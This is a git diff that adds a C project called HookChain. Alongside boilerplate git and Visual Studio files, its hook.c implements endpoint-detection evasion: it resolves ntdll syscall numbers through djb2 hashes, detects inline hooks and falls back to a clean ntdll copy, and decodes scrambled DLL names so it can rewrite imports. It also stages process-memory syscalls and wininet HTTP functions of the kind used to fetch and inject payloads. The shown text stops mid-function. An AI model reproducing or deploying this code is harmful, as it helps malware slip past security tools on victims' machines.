diff --git a/.gitattributes b/.gitattributes
new file mode 100644
index 0000000..1ff0c42
--- /dev/null
+++ b/.gitattributes
@@ -0,0 +1,63 @@
+# Set default behavior to automatically normalize line endings.
+* text=auto
+# Set default behavior for command prompt diff.
+# This is need for earlier builds of msysgit that does not have it on by
+# default for csharp files.
+# Note: This is only used by command line
+#*.cs diff=csharp
+# Set the merge driver for project and solution files
+# Merging from the command prompt will add diff markers to the files if there
+# are conflicts (Merging from VS is not affected by the settings below, in VS
+# the diff markers are never inserted). Diff markers may cause the following
+# file extensions to fail to load in VS. An alternative would be to treat
+# these files as binary and thus will always conflict and require user
+# intervention with every merge. To do so, just uncomment the entries below
+#*.sln merge=binary
+#*.csproj merge=binary
+#*.vbproj merge=binary
+#*.vcxproj merge=binary
+#*.vcproj merge=binary
+#*.dbproj merge=binary
+#*.fsproj merge=binary
+#*.lsproj merge=binary
+#*.wixproj merge=binary
+#*.modelproj merge=binary
+#*.sqlproj merge=binary
+#*.wwaproj merge=binary
+# behavior for image files
+# image files are treated as binary by default.
+#*.jpg binary
+#*.png binary
+#*.gif binary
+# diff behavior for common document formats
+# Convert binary document formats to text before diffing them. This feature
+# is only available from the command line. Turn it on by uncommenting the
+# entries below.
+#*.doc diff=astextplain
+#*.DOC diff=astextplain
+#*.docx diff=astextplain
+#*.DOCX diff=astextplain
+#*.dot diff=astextplain
+#*.DOT diff=astextplain
+#*.pdf diff=astextplain
+#*.PDF diff=astextplain
+#*.rtf diff=astextplain
+#*.RTF diff=astextplain
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..4af530a
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,365 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
+# User-specific files
+# User-specific files (MonoDevelop/Xamarin Studio)
+# Mono auto generated files
+# Build results
+# Visual Studio 2015/2017 cache/options directory
+# Uncomment if you have tasks that create the project's static files in wwwroot
+# Visual Studio 2017 auto generated files
+Generated\ Files/
+# MSTest test Results
+# NUnit
+# Build Results of an ATL Project
+# Benchmark Results
+# .NET Core
+# ASP.NET Scaffolding
+# StyleCop
+# Files built by Visual Studio
+# Chutzpah Test files
+# Visual C++ cache files
+# Visual Studio profiler
+# Visual Studio Trace Files
+# TFS 2012 Local Workspace
+# Guidance Automation Toolkit
+# ReSharper is a .NET coding add-in
+# TeamCity is a build add-in
+# DotCover is a Code Coverage Tool
+# AxoCover is a Code Coverage Tool
+# Coverlet is a free, cross platform Code Coverage Tool
+# Visual Studio code coverage results
+# NCrunch
+# MightyMoose
+# Web workbench (sass)
+# Installshield output folder
+# DocProject is a documentation generator add-in
+# Click-Once directory
+# Publish Web Output
+# Note: Comment the next line if you want to checkin your web deploy settings,
+# but database connection strings (with potential passwords) will be unencrypted
+# Microsoft Azure Web App publish settings. Comment the next line if you want to
+# checkin your Azure Web App publish settings, but sensitive information contained
+# in these scripts will be unencrypted
+# NuGet Packages
+# NuGet Symbol Packages
+# The packages folder can be ignored because of Package Restore
+# except build/, which is used as an MSBuild target.
+# Uncomment if necessary however generally it will be regenerated when needed
+# NuGet v3's project.json files produces more ignorable files
+# Microsoft Azure Build Output
+# Microsoft Azure Emulator
+# Windows Store app package directories and files
+# Visual Studio cache files
+# files ending in .cache can be ignored
+# but keep track of directories ending in .cache
+# Others
+# Including strong name files can present a security risk
+# (https://github.com/github/gitignore/pull/2483#issue-259490424)
+# Since there are multiple workflows, uncomment next line to ignore bower_components
+# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
+# RIA/Silverlight projects
+# Backup & report files from converting an old project file
+# to a newer Visual Studio version. Backup files are not needed,
+# because we have git ;-)
+# SQL Server files
+# Business Intelligence projects
+*- [Bb]ackup.rdl
+*- [Bb]ackup ([0-9]).rdl
+*- [Bb]ackup ([0-9][0-9]).rdl
+# Microsoft Fakes
+# GhostDoc plugin setting file
+# Node.js Tools for Visual Studio
+# Visual Studio 6 build log
+# Visual Studio 6 workspace options file
+# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
+# Visual Studio LightSwitch build output
+# Paket dependency manager
+# FAKE - F# Make
+# CodeRush personal settings
+# Python Tools for Visual Studio (PTVS)
+# Cake - Uncomment if you are using it
+# tools/**
+# !tools/packages.config
+# Tabs Studio
+# Telerik's JustMock configuration file
+# BizTalk build output
+# OpenCover UI analysis results
+# Azure Stream Analytics local run output
+# MSBuild Binary and Structured Log
+# NVidia Nsight GPU debugger configuration file
+# MFractors (Xamarin productivity tool) working folder
+# Local History for Visual Studio
+# BeatPulse healthcheck temp database
+# Backup folder for Package Reference Convert tool in Visual Studio 2017
+# Ionide (cross platform F# VS Code tools) working folder
+# Fody - auto-generated XML schema
\ No newline at end of file
diff --git a/HookChain/.gitattributes b/HookChain/.gitattributes
new file mode 100644
index 0000000..1ff0c42
--- /dev/null
+++ b/HookChain/.gitattributes
@@ -0,0 +1,63 @@
+# Set default behavior to automatically normalize line endings.
+* text=auto
+# Set default behavior for command prompt diff.
+# This is need for earlier builds of msysgit that does not have it on by
+# default for csharp files.
+# Note: This is only used by command line
+#*.cs diff=csharp
+# Set the merge driver for project and solution files
+# Merging from the command prompt will add diff markers to the files if there
+# are conflicts (Merging from VS is not affected by the settings below, in VS
+# the diff markers are never inserted). Diff markers may cause the following
+# file extensions to fail to load in VS. An alternative would be to treat
+# these files as binary and thus will always conflict and require user
+# intervention with every merge. To do so, just uncomment the entries below
+#*.sln merge=binary
+#*.csproj merge=binary
+#*.vbproj merge=binary
+#*.vcxproj merge=binary
+#*.vcproj merge=binary
+#*.dbproj merge=binary
+#*.fsproj merge=binary
+#*.lsproj merge=binary
+#*.wixproj merge=binary
+#*.modelproj merge=binary
+#*.sqlproj merge=binary
+#*.wwaproj merge=binary
+# behavior for image files
+# image files are treated as binary by default.
+#*.jpg binary
+#*.png binary
+#*.gif binary
+# diff behavior for common document formats
+# Convert binary document formats to text before diffing them. This feature
+# is only available from the command line. Turn it on by uncommenting the
+# entries below.
+#*.doc diff=astextplain
+#*.DOC diff=astextplain
+#*.docx diff=astextplain
+#*.DOCX diff=astextplain
+#*.dot diff=astextplain
+#*.DOT diff=astextplain
+#*.pdf diff=astextplain
+#*.PDF diff=astextplain
+#*.rtf diff=astextplain
+#*.RTF diff=astextplain
diff --git a/HookChain/.gitignore b/HookChain/.gitignore
new file mode 100644
index 0000000..4af530a
--- /dev/null
+++ b/HookChain/.gitignore
@@ -0,0 +1,365 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
+# User-specific files
+# User-specific files (MonoDevelop/Xamarin Studio)
+# Mono auto generated files
+# Build results
+# Visual Studio 2015/2017 cache/options directory
+# Uncomment if you have tasks that create the project's static files in wwwroot
+# Visual Studio 2017 auto generated files
+Generated\ Files/
+# MSTest test Results
+# NUnit
+# Build Results of an ATL Project
+# Benchmark Results
+# .NET Core
+# ASP.NET Scaffolding
+# StyleCop
+# Files built by Visual Studio
+# Chutzpah Test files
+# Visual C++ cache files
+# Visual Studio profiler
+# Visual Studio Trace Files
+# TFS 2012 Local Workspace
+# Guidance Automation Toolkit
+# ReSharper is a .NET coding add-in
+# TeamCity is a build add-in
+# DotCover is a Code Coverage Tool
+# AxoCover is a Code Coverage Tool
+# Coverlet is a free, cross platform Code Coverage Tool
+# Visual Studio code coverage results
+# NCrunch
+# MightyMoose
+# Web workbench (sass)
+# Installshield output folder
+# DocProject is a documentation generator add-in
+# Click-Once directory
+# Publish Web Output
+# Note: Comment the next line if you want to checkin your web deploy settings,
+# but database connection strings (with potential passwords) will be unencrypted
+# Microsoft Azure Web App publish settings. Comment the next line if you want to
+# checkin your Azure Web App publish settings, but sensitive information contained
+# in these scripts will be unencrypted
+# NuGet Packages
+# NuGet Symbol Packages
+# The packages folder can be ignored because of Package Restore
+# except build/, which is used as an MSBuild target.
+# Uncomment if necessary however generally it will be regenerated when needed
+# NuGet v3's project.json files produces more ignorable files
+# Microsoft Azure Build Output
+# Microsoft Azure Emulator
+# Windows Store app package directories and files
+# Visual Studio cache files
+# files ending in .cache can be ignored
+# but keep track of directories ending in .cache
+# Others
+# Including strong name files can present a security risk
+# (https://github.com/github/gitignore/pull/2483#issue-259490424)
+# Since there are multiple workflows, uncomment next line to ignore bower_components
+# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
+# RIA/Silverlight projects
+# Backup & report files from converting an old project file
+# to a newer Visual Studio version. Backup files are not needed,
+# because we have git ;-)
+# SQL Server files
+# Business Intelligence projects
+*- [Bb]ackup.rdl
+*- [Bb]ackup ([0-9]).rdl
+*- [Bb]ackup ([0-9][0-9]).rdl
+# Microsoft Fakes
+# GhostDoc plugin setting file
+# Node.js Tools for Visual Studio
+# Visual Studio 6 build log
+# Visual Studio 6 workspace options file
+# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
+# Visual Studio LightSwitch build output
+# Paket dependency manager
+# FAKE - F# Make
+# CodeRush personal settings
+# Python Tools for Visual Studio (PTVS)
+# Cake - Uncomment if you are using it
+# tools/**
+# !tools/packages.config
+# Tabs Studio
+# Telerik's JustMock configuration file
+# BizTalk build output
+# OpenCover UI analysis results
+# Azure Stream Analytics local run output
+# MSBuild Binary and Structured Log
+# NVidia Nsight GPU debugger configuration file
+# MFractors (Xamarin productivity tool) working folder
+# Local History for Visual Studio
+# BeatPulse healthcheck temp database
+# Backup folder for Package Reference Convert tool in Visual Studio 2017
+# Ionide (cross platform F# VS Code tools) working folder
+# Fody - auto-generated XML schema
\ No newline at end of file
diff --git a/HookChain/HookChain/HookChain.vcxproj b/HookChain/HookChain/HookChain.vcxproj
new file mode 100644
index 0000000..4d00bb8
--- /dev/null
+++ b/HookChain/HookChain/HookChain.vcxproj
@@ -0,0 +1,154 @@
+ Debug
+ Win32
+ Release
+ Win32
+ Debug
+ x64
+ Release
+ x64
+ 17.0
+ Win32Proj
+ {b0c08c11-23c4-495f-b40b-14066f12faab}
+ HookChain
+ 10.0.18362.0
+ HookChain_msg
+ Application
+ true
+ v143
+ Unicode
+ Application
+ false
+ v143
+ true
+ Unicode
+ Application
+ true
+ v142
+ Unicode
+ Application
+ false
+ v142
+ true
+ Unicode
+ Static
+ Level3
+ true
+ WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ Console
+ true
+ Level3
+ true
+ true
+ true
+ WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ Console
+ true
+ true
+ true
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ Console
+ true
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ Disabled
+ CompileAsC
+ false
+ false
+ Console
+ true
+ true
+ false
+ Document
+ false
\ No newline at end of file
diff --git a/HookChain/HookChain/HookChain.vcxproj.filters b/HookChain/HookChain/HookChain.vcxproj.filters
new file mode 100644
index 0000000..afe2b31
--- /dev/null
+++ b/HookChain/HookChain/HookChain.vcxproj.filters
@@ -0,0 +1,41 @@
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+ {0339378c-afc2-4b49-aa64-16cc34be8a8f}
+ Header Files
+ Header Files
+ Source Files
+ Source Files
+ ASM Files
\ No newline at end of file
diff --git a/HookChain/HookChain/gate.c b/HookChain/HookChain/gate.c
new file mode 100644
index 0000000..4ee96c7
--- /dev/null
+++ b/HookChain/HookChain/gate.c
@@ -0,0 +1,4 @@
+#pragma once
+#include "gate.h"
diff --git a/HookChain/HookChain/gate.h b/HookChain/HookChain/gate.h
new file mode 100644
index 0000000..e69de29
diff --git a/HookChain/HookChain/hook.c b/HookChain/HookChain/hook.c
new file mode 100644
index 0000000..a0d6c30
--- /dev/null
+++ b/HookChain/HookChain/hook.c
@@ -0,0 +1,1130 @@
+#pragma once
+#include "hook.h"
+static SYSCALL_LIST SyscallList;
+static SYSCALL_LIST HookList;
+static MODULE_LIST ModList;
+static FARPROC ntdllBase;
+static FARPROC kernel32Base;
+static FARPROC kernelbaseBase;
+extern BOOLEAN SetTableAddr(PVOID pSyscallTable);
+extern BOOLEAN SetIdx(DWORD functionIndex, DWORD listIndex);
+extern BOOLEAN GetData(PDWORD* dwSSN, PVOID* pSyscallRet);
+extern VOID SetDebug(BOOLEAN enabled);
+extern VOID SetAddr(PVOID* pAddr);
+extern VOID ExecAddr(_In_ HANDLE hProcess, _In_ LPCSTR imageName, _In_ BOOLEAN force);
+extern VOID SetFunctions(PVOID* pInternetOpenA, PVOID* pInternetConnectA, PVOID* pHttpOpenRequestA, PVOID* pInternetSetOptionA, PVOID* pHttpSendRequestA, PVOID* pInternetReadFile, PVOID* pNtAllocateVirtualMemory);
+extern NtAllocateVirtualMemoryStub();
+extern NtOpenProcessStub();
+extern NtProtectVirtualMemoryStub();
+extern NtReadVirtualMemoryStub();
+extern NtWriteVirtualMemoryStub();
+extern NtQueryVirtualMemoryStub();
+extern RtlCompareStringStub();
+extern RtlEqualStringStub();
+static PTEB RtlGetThreadEnvironmentBlock(VOID);
+EXTERN_C void PrintCall(unsigned long idx, unsigned long caller, unsigned long stack_addr)
+ /*printf(" ==> Hook reached: Entry[%d] SSN: 0x%02X, RET: 0x%p, RSP: 0x%p, Fnc Addr: 0x%p \n",
+ idx,
+ SyscallList.Entries[idx].dwSsn,
+ caller,
+ stack_addr,
+ SyscallList.Entries[idx].pAddress);*/
+ if (!FillSyscallTable())
+ {
+#ifdef DEBUG
+ printf("[!] Failed to fill Syscall List");
+ return FALSE;
+ }
+ FillStatic();
+ PVOID lpNameAddr = RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, 200);
+ LPCSTR names[12] = {
+ (char[]) { 0x32,0x2d,0x33,0x2b,0x6c,0x2d,0x65,0x25,0x24,0x24,0x6e,0x26,0x2a,0x72,0x28,0x2e,0x65,0x40,0x21,0x6b,0x00 }, //kernel32
+ (char[]) { 0x65,0x73,0x2e,0x61,0x62,0x23,0x24,0x6c,0x65,0x28,0x2a,0x6e,0x5e,0x72,0x25,0x24,0x65,0x40,0x21,0x6b,0x00 }, //kernelbase
+ (char[]) {0x32,0x33,0x72,0x24,0x23,0x65,0x29,0x2d,0x2d,0x73,0x40,0x21,0x75,0x24,0x23,0x40,0x00 }, //user32
+ (char[]) { 0x68,0x23,0x6e,0x2d,0x65,0xcb,0x86,0xcb,0x86,0x61,0x24,0x73,0x40,0x72,0x21,0x00 }, //rsaenh
+ (char[]) { 0x73,0x65,0x76,0x40,0x21,0x69,0x74,0x40,0x69,0x6d,0x26,0x69,0x72,0xcb,0x86,0x25,0x24,0x50,0x29,0x29,0x74,0x2d,0x70,0x79,0x23,0x72,0x63,0x3b,0x2e,0x40,0x21,0x62,0x00 }, //bcryptPrimitives
+ (char[]) { 0x70,0x74,0x2a,0x28,0x74,0x28,0x26,0x68,0xcb,0x86,0x25,0x6e,0x24,0x23,0x69,0x40,0x21,0x77,0x00 }, //winhttp
+ (char[]) { 0x32,0x33,0x25,0x24,0x5f,0x25,0x24,0x32,0x73,0x24,0x24,0x23,0x21,0x77,0x00 }, //WS2_32
+ (char[]) { 0x74,0x65,0x29,0x23,0x23,0x23,0x23,0x23,0x23,0x40,0x6e,0x69,0xcb,0x86,0x25,0x24,0x6e,0x2b,0x2d,0x69,0x26,0xcb,0x86,0x77,0x00 }, //wininet
+ (char[]) { 0x65,0x73,0x23,0x40,0x61,0x24,0x62,0x28,0x2a,0x26,0x74,0x70,0x79,0xcb,0x86,0x25,0x72,0x2a,0x28,0x29,0x63,0x00 }, //CRYPTBASE
+ (char[]) { 0x73,0x6c,0x21,0x69,0x21,0x74,0x21,0x75,0x21,0x74,0x21,0x65,0x21,0x6e,0x00 }, //netutils
+ (char[]) { 0x70,0x73,0x74,0x70,0x26,0x79,0x26,0xcb,0x86,0x72,0x25,0x24,0x23,0x63,0x00 }, //CRYPTSP
+ (char[]) { 0x65,0x72,0x40,0x6f,0x29,0x40,0x21,0x63,0x67,0x62,0xcb,0x86,0xcb,0x86,0x25,0x24,0x64,0x00 }, //dbgcore
+ };
+ for (WORD ib = 0; ib < 12; ib++)
+ {
+ LPCSTR lName = (LPCSTR)lpNameAddr;
+ memset(lpNameAddr, 0, 200);
+ WORD i2 = 0;
+ WORD s2 = 0;
+ for (short i = 0; i < 200; i++)
+ {
+ char c = (char)*(((PBYTE)names[ib]) + i);
+ if (c == 0x00) {
+ s2 = i - 1;
+ break;
+ }
+ }
+ for (signed short i = s2; i >= 0; i--)
+ {
+ char c = (char)*(((PBYTE)names[ib]) + i);
+ if ((c >= 0x30 && c <= 0x39) || (c >= 0x41 && c <= 0x5A) || (c >= 0x61 && c <= 0x7a) || c == 0x5f) {
+ ((char)*((char*)((PBYTE)lpNameAddr + i2++))) = (char)*(((PBYTE)names[ib]) + i);
+ }
+ }
+ ExecAddr(Local(), lName, TRUE);
+ //UnhookAll((HANDLE)-1, lName, FALSE);
+ }
+ return TRUE;
+ PTEB pCurrentTeb;
+ PPEB pCurrentPeb;
+ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory;
+ PIMAGE_DOS_HEADER pImageDosHeader;
+ PIMAGE_NT_HEADERS pImageNtHeaders;
+ PVOID pBase = NULL;
+ PVOID npBase;
+ pCurrentPeb = NtCurrentPeb();
+ if (!pCurrentPeb || pCurrentPeb->OSMajorVersion != 0x0a)
+ goto cfinal;
+ pImageExportDirectory = NULL;
+ pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);
+ pBase = pLdrDataEntry->DllBase;
+ pImageDosHeader = (PIMAGE_DOS_HEADER)pBase;
+ if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
+ goto cfinal;
+ pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pBase + pImageDosHeader->e_lfanew);
+ if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
+ goto cfinal;
+ if (pBase == NULL) {
+ npBase = GetClearNtdll();
+ if (npBase != NULL) {
+ pBase = npBase;
+ }
+ }
+ return pBase;
+static BOOL FillSyscallTable(VOID)
+ //Return if it already filled
+ if (SyscallList.Count > 0) return TRUE;
+ if (!GetBaseAddresses()) return FALSE;
+ PPEB pCurrentPeb;
+ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory;
+ PIMAGE_DOS_HEADER pImageDosHeader;
+ PIMAGE_NT_HEADERS pImageNtHeaders;
+ PVOID va;
+ PVOID pBase;
+ PVOID pRealBase = CurNtdll();
+ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory2 = NULL;
+ PIMAGE_NT_HEADERS pImageNtHeaders2 = NULL;
+ PDWORD pdwFunctions2 = NULL;
+ PDWORD pdwNames2 = NULL;
+ PWORD pwNameOrdinals2 = NULL;
+ pImageNtHeaders2 = ((PIMAGE_NT_HEADERS)((PBYTE)pRealBase + ((PIMAGE_DOS_HEADER)pRealBase)->e_lfanew));
+ if (pImageNtHeaders2->Signature == IMAGE_NT_SIGNATURE && pImageNtHeaders2->OptionalHeader.DataDirectory[0].Size > 0) {
+ pImageExportDirectory2 = (PBYTE)pRealBase + pImageNtHeaders2->OptionalHeader.DataDirectory[0].VirtualAddress;
+ pdwFunctions2 = (PDWORD)((PBYTE)pRealBase + pImageExportDirectory2->AddressOfFunctions);
+ pwNameOrdinals2 = (PWORD)((PBYTE)pRealBase + pImageExportDirectory2->AddressOfNameOrdinals);
+ }
+ SetTableAddr(&SyscallList.Entries);
+ pBase = ntdllBase;
+#ifdef DEBUG
+ printf("0x%p = &SyscallList\n0x%p = &Ntdll base\n0x%p = &Ntdll real base\n", &SyscallList, pBase, pRealBase);
+ pImageDosHeader = (PIMAGE_DOS_HEADER)pBase;
+ if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
+ return FALSE;
+ pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pBase + pImageDosHeader->e_lfanew);
+ if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
+ return FALSE;
+ ModList.Count = 1;
+ ModList.Entries[0].pAddress = pBase;
+ // Create a copy of the first 4096 bytes
+ PVOID lpLocalAddress = RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, pImageNtHeaders->OptionalHeader.DataDirectory[0].Size);
+ //PVOID lpLocalAddress = VirtualAllocEx((HANDLE)-1, NULL, pImageNtHeaders->OptionalHeader.DataDirectory[0].Size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ if (!lpLocalAddress)
+ return FALSE;
+ va = (PVOID)((PBYTE)pBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
+ memcpy(lpLocalAddress, va, pImageNtHeaders->OptionalHeader.DataDirectory[0].Size);
+ pImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(lpLocalAddress);
+#ifdef DEBUG
+ printf("0x%p = pImageExportDirectory\n", pImageExportDirectory);
+ printf("0x%p = lpLocalAddress\n", lpLocalAddress);
+ PDWORD pdwFunctions;
+ PDWORD pdwNames;
+ PWORD pwNameOrdinals;
+ PCHAR pcName = NULL;
+ PVOID pAddress = NULL;
+ pdwFunctions = RVA2OFFSET(PDWORD, pBase, lpLocalAddress, va, pImageExportDirectory->AddressOfFunctions);
+ pdwNames = RVA2OFFSET(PDWORD, pBase, lpLocalAddress, va, pImageExportDirectory->AddressOfNames);
+ pwNameOrdinals = RVA2OFFSET(PDWORD, pBase, lpLocalAddress, va, pImageExportDirectory->AddressOfNameOrdinals);
+ PSYSCALL_INFO Entries = SyscallList.Entries;
+ DWORD idx = 0;
+ BOOLEAN force = FALSE;
+#ifdef DEBUG
+ printf("[>] Hooked Ntdll Syscall List:\n");
+ USHORT nameBase[2] = { 'tN', 'wZ' };
+ for (WORD ib = 0; ib < sizeof(nameBase); ib++) {
+ for (WORD i = 0; i < pImageExportDirectory->NumberOfNames; i++) {
+ force = FALSE;
+ pcName = RVA2OFFSET(PDWORD, pBase, lpLocalAddress, va, pdwNames[i]);
+ pAddress = (PBYTE)pBase + pdwFunctions[pwNameOrdinals[i]];
+ if (pImageExportDirectory2 != NULL && (DWORD64)pBase != (DWORD64)pRealBase && pImageExportDirectory->NumberOfNames == pImageExportDirectory2->NumberOfNames) {
+ PVOID pAddress2 = (PBYTE)pRealBase + pdwFunctions2[pwNameOrdinals2[i]];
+ bDiff = ((DWORD64)pAddress != (DWORD64)pAddress2);
+ }
+ if (lstrcmpiA(pcName, "RtlAllocateHeap") == 0)
+ pRtlAllocateHeap = (PVOID)pAddress;
+ // Is this a system call?
+ if ((*(USHORT*)pcName != nameBase[ib]))
+ continue;
+ //Skip 2 first chars to ignore Zw and Nt
+ DWORD64 dwHash = djb2(((PBYTE)pcName) + 2);
+ if (dwHash == 0x66C71BD1B0714D3E) // NtQuerySystemTime => False positive
+ continue;
+ //Our minimal 7 functions
+ if ((dwHash == 0x8AD1C604A65844A5) || (dwHash == 0x7AF7191D67000DB5) || (dwHash == 0x852E6B87B62C2CF0) || (dwHash == 0x0F4CE15C0758B33F)
+ || (dwHash == 0x989246E5A13FCBD9) || (dwHash == 0x8599A0E7F8A94577) || (dwHash == 0x0EDA779755029A0A))
+ force = TRUE;
+ //Force other critical calls
+ /*
+ NtQueryVirtualMemory 0x0EDA779755029A0A
+ NtCreateUserProcess 0x172ECAD8537A0F66
+ NtCreateThread 0xDCAA9BF058531500
+ NtCreateThreadEx 0xB1C15967B96C5E5D
+ ZwResumeThread 0xE6EBB45B4D604B1D
+ */
+ if (!force && (
+ (dwHash == 0xDCAA9BF058531500) || (dwHash == 0xB1C15967B96C5E5D) || (dwHash == 0xE6EBB45B4D604B1D) || (dwHash == 0x172ECAD8537A0F66)
+ ))
+ force = TRUE;
+ ////printf("%s 0x%p 0x%p\n", pcName, pAddress, dwHash);
+ /*
+ Handle hooked functions
+ jmp
+ ; or
+ mov r10, rcx
+ jmp
+ */
+ DWORD64 dwSsn = GetSSN(pAddress);
+ if (dwSsn == -1)
+ continue;
+ PVOID pSyscallRet = GetNextSyscallInstruction(pAddress);
+ if (pSyscallRet == NULL)
+ continue;
+ BOOLEAN dupFound = FALSE;
+ for (DWORD id = 0; id < SyscallList.Count; id++)
+ {
+ ////printf("%d 0x%p 0x%p\n", id, (DWORD64)Entries[id].pAddress, (DWORD64)pAddress);
+ if ((DWORD64)Entries[id].pAddress == (DWORD64)pAddress) dupFound = TRUE;
+ }
+ if (dupFound)
+ continue;
+ Entries[idx].pAddress = pAddress;
+ Entries[idx].dwSsn = dwSsn;
+ Entries[idx].pSyscallRet = pSyscallRet;
+ Entries[idx].dwHash = dwHash;
+ Entries[idx].bIsHooked = (BOOLEAN)(force || bDiff || (*((PBYTE)pAddress) == 0xe9 || *((PBYTE)pAddress + 3) == 0xe9));
+#ifdef DEBUG
+ if (Entries[idx].bIsHooked)
+ {
+ printf(" |--> Entries[%03lu] SSN = 0x%04X, Address = 0x%p: %s\n", idx, dwSsn, pAddress, pcName);
+ }
+ if (dwHash == 0x8AD1C604A65844A5)
+ SetIdx(0, idx); // 0 => ZwOpenProcess
+ else if (dwHash == 0x7AF7191D67000DB5)
+ SetIdx(1, idx); // 1 => ZwProtectVirtualMemory
+ else if (dwHash == 0x852E6B87B62C2CF0)
+ SetIdx(2, idx); // 2 => ZwReadVirtualMemory
+ else if (dwHash == 0x0F4CE15C0758B33F)
+ SetIdx(3, idx); // 3 => ZwWriteVirtualMemory
+ else if (dwHash == 0x989246E5A13FCBD9)
+ SetIdx(4, idx); // 4 => ZwAllocateVirtualMemory
+ else if (dwHash == 0x8599A0E7F8A94577)
+ SetIdx(5, idx); // 5 => ZwDelayExecution
+ else if (dwHash == 0x0EDA779755029A0A)
+ SetIdx(6, idx); // 6 => NtQueryVirtualMemory
+ idx++;
+ if (idx == MAX_ENTRIES) break;
+ continue;
+ }
+ // Save total number of system calls found.
+ SyscallList.Count = idx;
+ if (idx == MAX_ENTRIES) break;
+ }
+ if (SyscallList.Count < 7) {
+#ifdef DEBUG
+ printf(" |--> Getting other Ntdll version\n");
+ PVOID npBase = GetClearNtdll();
+ if ((npBase != NULL) && ((DWORD64)npBase != (DWORD64)pBase)) {
+ pBase = npBase;
+ goto procdll;
+ }
+ }
+#ifdef DEBUG
+ printf(" +--> Mapped %lld functions\n", SyscallList.Count);
+ if (SyscallList.Count > 0) {
+ SetAddr(&UnhookAll);
+ }
+ return SyscallList.Count > 0;
+BOOL FillStatic()
+ /*
+ GetProcAddress 0x7E5C872C2386C38E
+ ReadProcessMemory 0x008A113C2D680A68
+ VirtualProtect 0x9BE32131D8A4F9FC
+ VirtualProtectEx 0x2130350A95CB7259
+ VirtualQuery 0xE9CF8C23129C8A71
+ VirtualQueryEx 0x9BE321322BE8F40E
+ */
+ if (HookList.Count == 0) {
+ HookList.Entries[0].pStubFunction = &HGetProcAddress3;
+ HookList.Entries[0].dwHash = 0x7E5C872C2386C38E;
+ HookList.Entries[1].pStubFunction = &HReadProcessMemory;
+ HookList.Entries[1].dwHash = 0x008A113C2D680A68;
+ //HookList.Entries[2].pStubFunction = &HVirtualProtect;
+ //HookList.Entries[2].dwHash = 0x9BE32131D8A4F9FC;
+ HookList.Entries[3].pStubFunction = &HVirtualProtectEx;
+ HookList.Entries[3].dwHash = 0x2130350A95CB7259;
+ //HookList.Entries[4].pStubFunction = &HVirtualQuery;
+ //HookList.Entries[4].dwHash = 0xE9CF8C23129C8A71;
+ //HookList.Entries[5].pStubFunction = &HVirtualQueryEx;
+ //HookList.Entries[5].dwHash = 0x9BE321322BE8F40E;
+ HookList.Count = 6;
+ }
+ return TRUE;
+BOOL ProcAllByAddr(_In_ LPCSTR imageBaseName, _In_ PVOID imageBase, _In_opt_ HANDLE hProcess)
+ PIMAGE_DOS_HEADER pImageDosHeader;
+ PIMAGE_NT_HEADERS pImageNtHeaders;
+ PVOID va;
+ LPCSTR imageName;
+ unsigned int hCount = 0;
+ if (imageBaseName != NULL) {
+ imageName = imageBaseName;
+ }
+ else {
+ imageName = "in memory";
+ }
+ if (hProcess == NULL)
+ hProcess = (HANDLE)-1;
+ pImageDosHeader = (PIMAGE_DOS_HEADER)imageBase;
+ if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
+ return FALSE;
+ pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)imageBase + pImageDosHeader->e_lfanew);
+ if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
+ return FALSE;
+ // Create a copy of the first 4096 bytes
+ //PVOID lpLocalAddress = VirtualAllocEx((HANDLE)-1, NULL, pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ PVOID lpLocalAddress = RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size);
+ if (!lpLocalAddress)
+ return FALSE;
